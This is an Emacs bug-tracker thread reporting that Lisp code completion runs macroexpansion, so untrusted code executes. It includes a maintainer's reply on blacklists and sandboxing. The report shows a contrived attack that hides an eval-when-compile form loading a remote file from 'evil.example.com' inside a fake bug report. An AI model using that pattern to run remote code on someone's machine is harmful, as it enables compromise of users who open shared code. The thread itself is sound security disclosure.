* bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
@ 2018-08-22 0:11 Wilfred Hughes
2018-08-23 18:54 ` Stefan Monnier
0 siblings, 1 reply; 2+ messages in thread
From: Wilfred Hughes @ 2018-08-22 0:11 UTC (permalink / raw)
To: 32495
elisp-completion-at-point calls macroexpand, which may execute arbitrary code.
REPRODUCING
1. Insert this code in a buffer in emacs-lisp-mode.
(let ((foo (eval-when-compile (debug))))
x)
2. Put point on x.
3. Press C-M-i, or M-x elisp-completion-at-point.
4. Observe that the debugger is opened, because code is being executed!
SEVERITY
I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:
(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
;; ... lots of code
(bar 1))
;; Dear maintainer, I've found a bug in your completion. Please try
;; completion in the following:
abc
)
This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.
WORKAROUNDS
When calling macroexpand or macroexpand-all, either:
1. pass in an environment with all untrusted macros replaced with dummies:
(let ((macro-whitelist '(when pcase))
all-macros
safe-env)
(mapatoms
(lambda (sym)
(when (macrop sym)
(push sym all-macros))))
(mapc
(lambda (sym)
(unless (memq sym macro-whitelist)
(push (cons sym (symbol-function 'ignore))
safe-env)))
all-macros)
(macroexpand-all
arbitrary-form-here
safe-env))
2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):
(cl-letf (((symbol-function 'eval) #'ignore)
((symbol-function 'eval-region) #'ignore)
((symbol-function 'eval-buffer) #'ignore)
((symbol-function 'backtrace-eval) #'ignore))
(macroexpand-all some-arbitrary-form-here))
^ permalink raw reply [flat|nested] 2+ messages in thread
* bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
2018-08-22 0:11 bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code Wilfred Hughes
@ 2018-08-23 18:54 ` Stefan Monnier
0 siblings, 0 replies; 2+ messages in thread
From: Stefan Monnier @ 2018-08-23 18:54 UTC (permalink / raw)
To: Wilfred Hughes; +Cc: 32495
> 1. pass in an environment with all untrusted macros replaced with dummies:
Sounds like a good first step.
We could even start with a blacklist rather than a whitelist
(eval-when-compile, eval-and-compile, cl-eval-when, ...), so the point
would be to protect oneself from accidental problems rather than from
malign adversaries.
> 2. bind all eval-capable functions first (INCOMPLETE, there are other
> eval-capable functions, such as load):
Trying to plug each and every hole sounds like a losing game
(e.g. you can implement `eval` by building a `(lambda () ,exp) and then
causing it to be called one way or another).
Ideally, we'd have some way to confine Elisp code to a sandbox of some
sort (e.g. no access to any I/O and all changes to global vars are ignored).
Stefan
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2018-08-23 18:54 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2018-08-22 0:11 bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code Wilfred Hughes
2018-08-23 18:54 ` Stefan Monnier
Code repositories for project(s) associated with this public inbox
https://git.savannah.gnu.org/cgit/emacs.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).